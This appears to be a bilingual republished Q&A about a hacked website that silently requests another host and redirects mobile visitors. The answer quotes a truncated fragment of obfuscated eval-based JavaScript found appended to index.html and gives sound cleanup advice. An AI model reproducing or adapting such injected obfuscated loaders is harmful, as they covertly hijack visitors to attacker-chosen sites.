我的网站正在加载其他网站，导致它重定向到它 [英] My site is loading some other site, causing it to redirect to it

问题描述

我的网站 http://moremariners.com 正在向 http://bookiemonster.com/ads.php （这甚至不是真正的页面），导致它重定向到移动浏览器上的页面。您可以看到该请求也是在PC上进行的，如果您使用Google Chrome进行检查，则可以看到GET请求。但是，我的文件都没有包含对主机的get请求。

My site, http://moremariners.com is making a request to http://bookiemonster.com/ads.php (which isnt even a real page), causing it to redirect to the page on mobile browsers. You can see that the request is made on a PC, too, and if you inspect with Google Chrome, you can see the GET request for it. However, none of my files include a get request to the host.

如何摆脱这种垃圾？

推荐答案

注意 index.html 文件的最后：

</html><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k...

您的网站遭到黑客入侵。

Your site has been hacked.

此处是否有人会努力解码这个JavaScript 做什么，加载什么HTML等等（我会发现有趣的阅读），关键是你的网站有不安全的配置或带有漏洞的代码。

Whether or not someone here will go to the effort of decoding what this JavaScript does, what HTML it loads, etc. (which I would find interesting reading), the point is that your site has either insecure configurations or code with vulnerabilities.

最安全的方法是擦拭机器。（真的。 Rootkits 现在是非常不可思议的事情。其他人可能比您更好地控制您的计算机。）然后使用最新发布和支持的版本重新安装CMS。然后重新安装从已知良好数据源转储的数据。 （您执行对数据进行离线备份，对吗？）在将数据加载到新实例之前，请确保数据干净且无问题。请确保尽可能严格地配置访问控制，以便将来的攻击更加困难。还可以考虑部署强制访问控制工具，例如 AppArmor ， SELinux ， TOMOYO ，或 SMACK 。 （我已成为AppArmor团队成员已有十多年了;这是我对大多数用户的建议，但其他工具之一可能更适合您或您的组织。）

The safest way forward is to wipe the machine. (Really. Rootkits are pretty incredible things these days. Someone else may have better control of your machine than you do.) Then re-install your CMS using the latest released and supported version. Then re-install your data, dumped from a known good data source. (You do have off-line backups of your data, right?) Make sure your data is clean and problem-free before loading it in your new instance. Make sure you configure your access controls as tight as possible, so that future attacks are more difficult. Consider also deploying a mandatory access control tool such as AppArmor, SELinux, TOMOYO, or SMACK. (I've been an AppArmor team member for over a decade now; it's my recommendation for most users but one of the other tools may be a better fit for you or your organization.)

这篇关于我的网站正在加载其他网站，导致它重定向到它的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！